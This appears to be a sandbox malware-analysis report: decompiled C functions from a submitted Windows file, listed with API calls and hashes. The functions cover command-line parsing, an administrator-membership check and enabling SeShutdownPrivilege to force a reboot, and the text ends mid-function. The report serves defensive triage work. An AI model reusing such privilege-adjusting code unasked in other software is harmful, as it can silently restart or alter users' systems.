                                                          • Instruction ID: 1ca0fff231c36d7163d3c7a23f5a679f5331d2cba1adbac846761f193e0ecc8a
                                                          • Opcode Fuzzy Hash: e7642888bf18f1af8f95bf055a3a2d254b958f6a9e571c7a975b07031b9d3f26
                                                          • Instruction Fuzzy Hash: 50B09276222444876A710735682955A3881A6C163A7E41B94F072C12D4DA3FD446E904
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010C4CA0(long _a4) {
                                                          				void* _t2;
                                                          
                                                          				_t2 = GlobalAlloc(0, _a4); // executed
                                                          				return _t2;
                                                          			}





                                                          APIs
                                                          • GlobalAlloc.KERNELBASE(00000000,?), ref: 010C4CAA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: AllocGlobal
                                                          • String ID:
                                                          • API String ID: 3761449716-0
                                                          • Opcode ID: 29fb8340fa1e6f76654e260a74402cd56a20e6d96b947e30e41a32a22a6e6e24
                                                          • Instruction ID: eda47b39be623c34b6c5a2301b9219acb1a1340b6fff1d2d4d5b55db93a81e4d
                                                          • Opcode Fuzzy Hash: 29fb8340fa1e6f76654e260a74402cd56a20e6d96b947e30e41a32a22a6e6e24
                                                          • Instruction Fuzzy Hash: 39B0123214420CFBCF101FC2E809F853F1DE7C47A1F240000F60C460809A7794108B95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010C4CC0(void* _a4) {
                                                          				void* _t2;
                                                          
                                                          				_t2 = GlobalFree(_a4); // executed
                                                          				return _t2;
                                                          			}





                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: FreeGlobal
                                                          • String ID:
                                                          • API String ID: 2979337801-0
                                                          • Opcode ID: f244440f3fbd8f5b7d04aa854d8530359d5fc3e79c10dd223cfea60e1a4a9374
                                                          • Instruction ID: d5da4952d989e679a32bb0c39f2df689e60985a843c8d48694c118a7940c1ee2
                                                          • Opcode Fuzzy Hash: f244440f3fbd8f5b7d04aa854d8530359d5fc3e79c10dd223cfea60e1a4a9374
                                                          • Instruction Fuzzy Hash: 20B0123100010CFB8F101B42E8088453F1DD6C03A07100010F50C420119B3B98118A84
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 92%
                                                          			E010C5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				CHAR* _v265;
                                                          				char _v266;
                                                          				char _v267;
                                                          				char _v268;
                                                          				CHAR* _v272;
                                                          				char _v276;
                                                          				signed int _v296;
                                                          				char _v556;
                                                          				signed int _t61;
                                                          				int _t63;
                                                          				char _t67;
                                                          				CHAR* _t69;
                                                          				signed int _t71;
                                                          				void* _t75;
                                                          				char _t79;
                                                          				void* _t83;
                                                          				void* _t85;
                                                          				void* _t87;
                                                          				intOrPtr _t88;
                                                          				void* _t100;
                                                          				intOrPtr _t101;
                                                          				CHAR* _t104;
                                                          				intOrPtr _t105;
                                                          				void* _t111;
                                                          				void* _t115;
                                                          				CHAR* _t118;
                                                          				void* _t119;
                                                          				void* _t127;
                                                          				CHAR* _t129;
                                                          				void* _t132;
                                                          				void* _t142;
                                                          				signed int _t143;
                                                          				CHAR* _t144;
                                                          				void* _t145;
                                                          				void* _t146;
                                                          				void* _t147;
                                                          				void* _t149;
                                                          				char _t155;
                                                          				void* _t157;
                                                          				void* _t162;
                                                          				void* _t163;
                                                          				char _t167;
                                                          				char _t170;
                                                          				CHAR* _t173;
                                                          				void* _t177;
                                                          				intOrPtr* _t183;
                                                          				intOrPtr* _t192;
                                                          				CHAR* _t199;
                                                          				void* _t200;
                                                          				CHAR* _t201;
                                                          				void* _t205;
                                                          				void* _t206;
                                                          				int _t209;
                                                          				void* _t210;
                                                          				void* _t212;
                                                          				void* _t213;
                                                          				CHAR* _t218;
                                                          				intOrPtr* _t219;
                                                          				intOrPtr* _t220;
                                                          				signed int _t221;
                                                          				signed int _t223;
                                                          
                                                          				_t173 = __ecx;
                                                          				_t61 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t61 ^ _t221;
                                                          				_push(__ebx);
                                                          				_push(__esi);
                                                          				_push(__edi);
                                                          				_t209 = 1;
                                                          				if(__ecx == 0 ||  *__ecx == 0) {
                                                          					_t63 = 1;
                                                          				} else {
                                                          					L2:
                                                          					while(_t209 != 0) {
                                                          						_t67 =  *_t173;
                                                          						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                          							_t173 = CharNextA(_t173);
                                                          							continue;
                                                          						}
                                                          						_v272 = _t173;
                                                          						if(_t67 == 0) {
                                                          							break;
                                                          						} else {
                                                          							_t69 = _v272;
                                                          							_t177 = 0;
                                                          							_t213 = 0;
                                                          							_t163 = 0;
                                                          							_t202 = 1;
                                                          							do {
                                                          								if(_t213 != 0) {
                                                          									if(_t163 != 0) {
                                                          										break;
                                                          									} else {
                                                          										goto L21;
                                                          									}
                                                          								} else {
                                                          									_t69 =  *_t69;
                                                          									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                          										break;
                                                          									} else {
                                                          										_t69 = _v272;
                                                          										L21:
                                                          										_t155 =  *_t69;
                                                          										if(_t155 != 0x22) {
                                                          											if(_t202 >= 0x104) {
                                                          												goto L106;
                                                          											} else {
                                                          												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                          												_t177 = _t177 + 1;
                                                          												_t202 = _t202 + 1;
                                                          												_t157 = 1;
                                                          												goto L30;
                                                          											}
                                                          										} else {
                                                          											if(_v272[1] == 0x22) {
                                                          												if(_t202 >= 0x104) {
                                                          													L106:
                                                          													_t63 = 0;
                                                          													L125:
                                                          													_pop(_t210);
                                                          													_pop(_t212);
                                                          													_pop(_t162);
                                                          													return E010C6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                          												} else {
                                                          													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                          													_t177 = _t177 + 1;
                                                          													_t202 = _t202 + 1;
                                                          													_t157 = 2;
                                                          													goto L30;
                                                          												}
                                                          											} else {
                                                          												_t157 = 1;
                                                          												if(_t213 != 0) {
                                                          													_t163 = 1;
                                                          												} else {
                                                          													_t213 = 1;
                                                          												}
                                                          												goto L30;
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          								goto L131;
                                                          								L30:
                                                          								_v272 =  &(_v272[_t157]);
                                                          								_t69 = _v272;
                                                          							} while ( *_t69 != 0);
                                                          							if(_t177 >= 0x104) {
                                                          								E010C6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                          								asm("int3");
                                                          								_push(_t221);
                                                          								_t222 = _t223;
                                                          								_t71 =  *0x10c8004; // 0x4b13cf70
                                                          								_v296 = _t71 ^ _t223;
                                                          								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                          									0x4f0 = 2;
                                                          									_t75 = E010C597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                          								} else {
                                                          									E010C44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                          									 *0x10c9124 = E010C6285();
                                                          									_t75 = 0;
                                                          								}
                                                          								return E010C6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                          							} else {
                                                          								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                          								if(_t213 == 0) {
                                                          									if(_t163 != 0) {
                                                          										goto L34;
                                                          									} else {
                                                          										goto L40;
                                                          									}
                                                          								} else {
                                                          									if(_t163 != 0) {
                                                          										L40:
                                                          										_t79 = _v268;
                                                          										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                          											_t83 = CharUpperA(_v267) - 0x3f;
                                                          											if(_t83 == 0) {
                                                          												_t202 = 0x521;
                                                          												E010C44B9(0, 0x521, 0x10c1140, 0, 0x40, 0);
                                                          												_t85 =  *0x10c8588; // 0x0
                                                          												if(_t85 != 0) {
                                                          													CloseHandle(_t85);
                                                          												}
                                                          												ExitProcess(0);
                                                          											}
                                                          											_t87 = _t83 - 4;
                                                          											if(_t87 == 0) {
                                                          												if(_v266 != 0) {
                                                          													if(_v266 != 0x3a) {
                                                          														goto L49;
                                                          													} else {
                                                          														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                          														_t215 =  &_v268 + _t167;
                                                          														_t183 =  &_v268 + _t167;
                                                          														_t50 = _t183 + 1; // 0x1
                                                          														_t202 = _t50;
                                                          														do {
                                                          															_t88 =  *_t183;
                                                          															_t183 = _t183 + 1;
                                                          														} while (_t88 != 0);
                                                          														if(_t183 == _t202) {
                                                          															goto L49;
                                                          														} else {
                                                          															_t205 = 0x5b;
                                                          															if(E010C667F(_t215, _t205) == 0) {
                                                          																L115:
                                                          																_t206 = 0x5d;
                                                          																if(E010C667F(_t215, _t206) == 0) {
                                                          																	L117:
                                                          																	_t202 =  &_v276;
                                                          																	_v276 = _t167;
                                                          																	if(E010C5C17(_t215,  &_v276) == 0) {
                                                          																		goto L49;
                                                          																	} else {
                                                          																		_t202 = 0x104;
                                                          																		E010C1680(0x10c8c42, 0x104, _v276 + _t167 +  &_v268);
                                                          																	}
                                                          																} else {
                                                          																	_t202 = 0x5b;
                                                          																	if(E010C667F(_t215, _t202) == 0) {
                                                          																		goto L49;
                                                          																	} else {
                                                          																		goto L117;
                                                          																	}
                                                          																}
                                                          															} else {
                                                          																_t202 = 0x5d;
                                                          																if(E010C667F(_t215, _t202) == 0) {
                                                          																	goto L49;
                                                          																} else {
                                                          																	goto L115;
                                                          																}
                                                          															}
                                                          														}
                                                          													}
                                                          												} else {
                                                          													 *0x10c8a24 = 1;
                                                          												}
                                                          												goto L50;
                                                          											} else {
                                                          												_t100 = _t87 - 1;
                                                          												if(_t100 == 0) {
                                                          													L98:
                                                          													if(_v266 != 0x3a) {
                                                          														goto L49;
                                                          													} else {
                                                          														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                          														_t217 =  &_v268 + _t170;
                                                          														_t192 =  &_v268 + _t170;
                                                          														_t38 = _t192 + 1; // 0x1
                                                          														_t202 = _t38;
                                                          														do {
                                                          															_t101 =  *_t192;
                                                          															_t192 = _t192 + 1;
                                                          														} while (_t101 != 0);
                                                          														if(_t192 == _t202) {
                                                          															goto L49;
                                                          														} else {
                                                          															_t202 =  &_v276;
                                                          															_v276 = _t170;
                                                          															if(E010C5C17(_t217,  &_v276) == 0) {
                                                          																goto L49;
                                                          															} else {
                                                          																_t104 = CharUpperA(_v267);
                                                          																_t218 = 0x10c8b3e;
                                                          																_t105 = _v276;
                                                          																if(_t104 != 0x54) {
                                                          																	_t218 = 0x10c8a3a;
                                                          																}
                                                          																E010C1680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                          																_t202 = 0x104;
                                                          																E010C658A(_t218, 0x104, 0x10c1140);
                                                          																if(E010C31E0(_t218) != 0) {
                                                          																	goto L50;
                                                          																} else {
                                                          																	goto L106;
                                                          																}
                                                          															}
                                                          														}
                                                          													}
                                                          												} else {
                                                          													_t111 = _t100 - 0xa;
                                                          													if(_t111 == 0) {
                                                          														if(_v266 != 0) {
                                                          															if(_v266 != 0x3a) {
                                                          																goto L49;
                                                          															} else {
                                                          																_t199 = _v265;
                                                          																if(_t199 != 0) {
                                                          																	_t219 =  &_v265;
                                                          																	do {
                                                          																		_t219 = _t219 + 1;
                                                          																		_t115 = CharUpperA(_t199) - 0x45;
                                                          																		if(_t115 == 0) {
                                                          																			 *0x10c8a2c = 1;
                                                          																		} else {
                                                          																			_t200 = 2;
                                                          																			_t119 = _t115 - _t200;
                                                          																			if(_t119 == 0) {
                                                          																				 *0x10c8a30 = 1;
                                                          																			} else {
                                                          																				if(_t119 == 0xf) {
                                                          																					 *0x10c8a34 = 1;
                                                          																				} else {
                                                          																					_t209 = 0;
                                                          																				}
                                                          																			}
                                                          																		}
                                                          																		_t118 =  *_t219;
                                                          																		_t199 = _t118;
                                                          																	} while (_t118 != 0);
                                                          																}
                                                          															}
                                                          														} else {
                                                          															 *0x10c8a2c = 1;
                                                          														}
                                                          														goto L50;
                                                          													} else {
                                                          														_t127 = _t111 - 3;
                                                          														if(_t127 == 0) {
                                                          															if(_v266 != 0) {
                                                          																if(_v266 != 0x3a) {
                                                          																	goto L49;
                                                          																} else {
                                                          																	_t129 = CharUpperA(_v265);
                                                          																	if(_t129 == 0x31) {
                                                          																		goto L76;
                                                          																	} else {
                                                          																		if(_t129 == 0x41) {
                                                          																			goto L83;
                                                          																		} else {
                                                          																			if(_t129 == 0x55) {
                                                          																				goto L76;
                                                          																			} else {
                                                          																				goto L49;
                                                          																			}
                                                          																		}
                                                          																	}
                                                          																}
                                                          															} else {
                                                          																L76:
                                                          																_push(2);
                                                          																_pop(1);
                                                          																L83:
                                                          																 *0x10c8a38 = 1;
                                                          															}
                                                          															goto L50;
                                                          														} else {
                                                          															_t132 = _t127 - 1;
                                                          															if(_t132 == 0) {
                                                          																if(_v266 != 0) {
                                                          																	if(_v266 != 0x3a) {
                                                          																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                          																			goto L49;
                                                          																		}
                                                          																	} else {
                                                          																		_t201 = _v265;
                                                          																		 *0x10c9a2c = 1;
                                                          																		if(_t201 != 0) {
                                                          																			_t220 =  &_v265;
                                                          																			do {
                                                          																				_t220 = _t220 + 1;
                                                          																				_t142 = CharUpperA(_t201) - 0x41;
                                                          																				if(_t142 == 0) {
                                                          																					_t143 = 2;
                                                          																					 *0x10c9a2c =  *0x10c9a2c | _t143;
                                                          																					goto L70;
                                                          																				} else {
                                                          																					_t145 = _t142 - 3;
                                                          																					if(_t145 == 0) {
                                                          																						 *0x10c8d48 =  *0x10c8d48 | 0x00000040;
                                                          																					} else {
                                                          																						_t146 = _t145 - 5;
                                                          																						if(_t146 == 0) {
                                                          																							 *0x10c9a2c =  *0x10c9a2c & 0xfffffffd;
                                                          																							goto L70;
                                                          																						} else {
                                                          																							_t147 = _t146 - 5;
                                                          																							if(_t147 == 0) {
                                                          																								 *0x10c9a2c =  *0x10c9a2c & 0xfffffffe;
                                                          																								goto L70;
                                                          																							} else {
                                                          																								_t149 = _t147;
                                                          																								if(_t149 == 0) {
                                                          																									 *0x10c8d48 =  *0x10c8d48 | 0x00000080;
                                                          																								} else {
                                                          																									if(_t149 == 3) {
                                                          																										 *0x10c9a2c =  *0x10c9a2c | 0x00000004;
                                                          																										L70:
                                                          																										 *0x10c8a28 = 1;
                                                          																									} else {
                                                          																										_t209 = 0;
                                                          																									}
                                                          																								}
                                                          																							}
                                                          																						}
                                                          																					}
                                                          																				}
                                                          																				_t144 =  *_t220;
                                                          																				_t201 = _t144;
                                                          																			} while (_t144 != 0);
                                                          																		}
                                                          																	}
                                                          																} else {
                                                          																	 *0x10c9a2c = 3;
                                                          																	 *0x10c8a28 = 1;
                                                          																}
                                                          																goto L50;
                                                          															} else {
                                                          																if(_t132 == 0) {
                                                          																	goto L98;
                                                          																} else {
                                                          																	L49:
                                                          																	_t209 = 0;
                                                          																	L50:
                                                          																	_t173 = _v272;
                                                          																	if( *_t173 != 0) {
                                                          																		goto L2;
                                                          																	} else {
                                                          																		break;
                                                          																	}
                                                          																}
                                                          															}
                                                          														}
                                                          													}
                                                          												}
                                                          											}
                                                          										} else {
                                                          											goto L106;
                                                          										}
                                                          									} else {
                                                          										L34:
                                                          										_t209 = 0;
                                                          										break;
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          						goto L131;
                                                          					}
                                                          					if( *0x10c8a2c != 0 &&  *0x10c8b3e == 0) {
                                                          						if(GetModuleFileNameA( *0x10c9a3c, 0x10c8b3e, 0x104) == 0) {
                                                          							_t209 = 0;
                                                          						} else {
                                                          							_t202 = 0x5c;
                                                          							 *((char*)(E010C66C8(0x10c8b3e, _t202) + 1)) = 0;
                                                          						}
                                                          					}
                                                          					_t63 = _t209;
                                                          				}
                                                          				L131:
                                                          			}


                                                          APIs
                                                          • CharNextA.USER32(?,00000000,?,?), ref: 010C5CEE
                                                          • GetModuleFileNameA.KERNEL32(010C8B3E,00000104,00000000,?,?), ref: 010C5DFC
                                                          • CharUpperA.USER32(?), ref: 010C5E3E
                                                          • CharUpperA.USER32(-00000052), ref: 010C5EE1
                                                          • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 010C5F6F
                                                          • CharUpperA.USER32(?), ref: 010C5FA7
                                                          • CharUpperA.USER32(-0000004E), ref: 010C6008
                                                          • CharUpperA.USER32(?), ref: 010C60AA
                                                          • CloseHandle.KERNEL32(00000000,010C1140,00000000,00000040,00000000), ref: 010C61F1
                                                          • ExitProcess.KERNEL32 ref: 010C61F8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                          • String ID: "$"$:$RegServer
                                                          • API String ID: 1203814774-25366791
                                                          • Opcode ID: 1b2ba0023a2e9949127f1611155c3cbfa4b6138a17c6b557a5719f0c154200a5
                                                          • Instruction ID: e6078d870a3371982ac7783e84f8104a9460b392d3ecd334f3b82013f98b4084
                                                          • Opcode Fuzzy Hash: 1b2ba0023a2e9949127f1611155c3cbfa4b6138a17c6b557a5719f0c154200a5
                                                          • Instruction Fuzzy Hash: E8D14775B042455EEB7A8B3C8C483FE3FE1AB56F04F0481EED5C6D6285D676A9828F40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 91%
                                                          			E010C18A3(void* __edx, void* __esi) {
                                                          				signed int _v8;
                                                          				short _v12;
                                                          				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                          				char _v20;
                                                          				long _v24;
                                                          				void* _v28;
                                                          				void* _v32;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				signed int _t23;
                                                          				long _t45;
                                                          				void* _t49;
                                                          				int _t50;
                                                          				void* _t52;
                                                          				signed int _t53;
                                                          
                                                          				_t51 = __esi;
                                                          				_t49 = __edx;
                                                          				_t23 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t23 ^ _t53;
                                                          				_t25 =  *0x10c8128; // 0x2
                                                          				_t45 = 0;
                                                          				_v12 = 0x500;
                                                          				_t50 = 2;
                                                          				_v16.Value = 0;
                                                          				_v20 = 0;
                                                          				if(_t25 != _t50) {
                                                          					L20:
                                                          					return E010C6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                          				}
                                                          				if(E010C17EE( &_v20) != 0) {
                                                          					_t25 = _v20;
                                                          					if(_v20 != 0) {
                                                          						 *0x10c8128 = 1;
                                                          					}
                                                          					goto L20;
                                                          				}
                                                          				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                          					goto L20;
                                                          				}
                                                          				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                          					L17:
                                                          					CloseHandle(_v28);
                                                          					_t25 = _v20;
                                                          					goto L20;
                                                          				} else {
                                                          					_push(__esi);
                                                          					_t52 = LocalAlloc(0, _v24);
                                                          					if(_t52 == 0) {
                                                          						L16:
                                                          						_pop(_t51);
                                                          						goto L17;
                                                          					}
                                                          					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                          						L15:
                                                          						LocalFree(_t52);
                                                          						goto L16;
                                                          					} else {
                                                          						if( *_t52 <= 0) {
                                                          							L14:
                                                          							FreeSid(_v32);
                                                          							goto L15;
                                                          						}
                                                          						_t15 = _t52 + 4; // 0x4
                                                          						_t50 = _t15;
                                                          						while(EqualSid( *_t50, _v32) == 0) {
                                                          							_t45 = _t45 + 1;
                                                          							_t50 = _t50 + 8;
                                                          							if(_t45 <  *_t52) {
                                                          								continue;
                                                          							}
                                                          							goto L14;
                                                          						}
                                                          						 *0x10c8128 = 1;
                                                          						_v20 = 1;
                                                          						goto L14;
                                                          					}
                                                          				}
                                                          			}

                                                          APIs
                                                            • Part of subcall function 010C17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,010C18DD), ref: 010C181A
                                                            • Part of subcall function 010C17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 010C182C
                                                            • Part of subcall function 010C17EE: AllocateAndInitializeSid.ADVAPI32(010C18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,010C18DD), ref: 010C1855
                                                            • Part of subcall function 010C17EE: FreeSid.ADVAPI32(?,?,?,?,010C18DD), ref: 010C1883
                                                            • Part of subcall function 010C17EE: FreeLibrary.KERNEL32(00000000,?,?,?,010C18DD), ref: 010C188A
                                                          • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 010C18EB
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 010C18F2
                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 010C190A
                                                          • GetLastError.KERNEL32 ref: 010C1918
                                                          • LocalAlloc.KERNEL32(00000000,?,?), ref: 010C192C
                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 010C1944
                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 010C1964
                                                          • EqualSid.ADVAPI32(00000004,?), ref: 010C197A
                                                          • FreeSid.ADVAPI32(?), ref: 010C199C
                                                          • LocalFree.KERNEL32(00000000), ref: 010C19A3
                                                          • CloseHandle.KERNEL32(?), ref: 010C19AD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                          • String ID:
                                                          • API String ID: 2168512254-0
                                                          • Opcode ID: 18869c3c050264640d2d04029292c705c4f209a5582c38e23ad7279273536ec1
                                                          • Instruction ID: bb52c257ad3eea1c7fcc367180508a0f05145595d0ab2a253fcc98a6dc8a52ba
                                                          • Opcode Fuzzy Hash: 18869c3c050264640d2d04029292c705c4f209a5582c38e23ad7279273536ec1
                                                          • Instruction Fuzzy Hash: 39312A71A00209EFDB609FA5DC48AEFBBBCFF44B40F204469F685D2145E73699049F61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 60%
                                                          			E010C1F90(signed int __ecx, void* __edi, void* __esi) {
                                                          				signed int _v8;
                                                          				int _v12;
                                                          				struct _TOKEN_PRIVILEGES _v24;
                                                          				void* _v28;
                                                          				void* __ebx;
                                                          				signed int _t13;
                                                          				int _t21;
                                                          				void* _t25;
                                                          				int _t28;
                                                          				signed char _t30;
                                                          				void* _t38;
                                                          				void* _t40;
                                                          				void* _t41;
                                                          				signed int _t46;
                                                          
                                                          				_t41 = __esi;
                                                          				_t38 = __edi;
                                                          				_t30 = __ecx;
                                                          				if((__ecx & 0x00000002) != 0) {
                                                          					L12:
                                                          					if((_t30 & 0x00000004) != 0) {
                                                          						L14:
                                                          						if( *0x10c9a40 != 0) {
                                                          							_pop(_t30);
                                                          							_t44 = _t46;
                                                          							_t13 =  *0x10c8004; // 0x4b13cf70
                                                          							_v8 = _t13 ^ _t46;
                                                          							_push(_t38);
                                                          							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                          								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                          								_v24.PrivilegeCount = 1;
                                                          								_v12 = 2;
                                                          								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                          								CloseHandle(_v28);
                                                          								_t41 = _t41;
                                                          								_push(0);
                                                          								if(_t21 != 0) {
                                                          									if(ExitWindowsEx(2, ??) != 0) {
                                                          										_t25 = 1;
                                                          									} else {
                                                          										_t37 = 0x4f7;
                                                          										goto L3;
                                                          									}
                                                          								} else {
                                                          									_t37 = 0x4f6;
                                                          									goto L4;
                                                          								}
                                                          							} else {
                                                          								_t37 = 0x4f5;
                                                          								L3:
                                                          								_push(0);
                                                          								L4:
                                                          								_push(0x10);
                                                          								_push(0);
                                                          								_push(0);
                                                          								E010C44B9(0, _t37);
                                                          								_t25 = 0;
                                                          							}
                                                          							_pop(_t40);
                                                          							return E010C6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                          						} else {
                                                          							_t28 = ExitWindowsEx(2, 0);
                                                          							goto L16;
                                                          						}
                                                          					} else {
                                                          						_t37 = 0x522;
                                                          						_t28 = E010C44B9(0, 0x522, 0x10c1140, 0, 0x40, 4);
                                                          						if(_t28 != 6) {
                                                          							goto L16;
                                                          						} else {
                                                          							goto L14;
                                                          						}
                                                          					}
                                                          				} else {
                                                          					__eax = E010C1EA7(__ecx);
                                                          					if(__eax != 2) {
                                                          						L16:
                                                          						return _t28;
                                                          					} else {
                                                          						goto L12;
                                                          					}
                                                          				}
                                                          			}

                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 010C1EFB
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 010C1F02
                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 010C1FD3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Process$CurrentExitOpenTokenWindows
                                                          • String ID: SeShutdownPrivilege
                                                          • API String ID: 2795981589-3733053543
                                                          • Opcode ID: 71a44dc21e15a54ae6cb65c4c049e5225a6da921cc3fd8078f5e658fbf1135b0
                                                          • Instruction ID: 3f1daa4911131172c41b886d44901991dedd89f319864bdbfd6676f79a25117a
                                                          • Opcode Fuzzy Hash: 71a44dc21e15a54ae6cb65c4c049e5225a6da921cc3fd8078f5e658fbf1135b0
                                                          • Instruction Fuzzy Hash: 5221B671B40206EBDB315BA59C49FBF76B8EB85F50F20001DFA82D6186D77984029F61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010C7176(signed int __eax, void* __edi, signed int __esi) {
                                                          				signed int _t32;
                                                          				signed int _t33;
                                                          				signed int _t35;
                                                          				void* _t36;
                                                          				signed int _t38;
                                                          				void* _t40;
                                                          
                                                          				_t38 = __esi;
                                                          				_t36 = __edi;
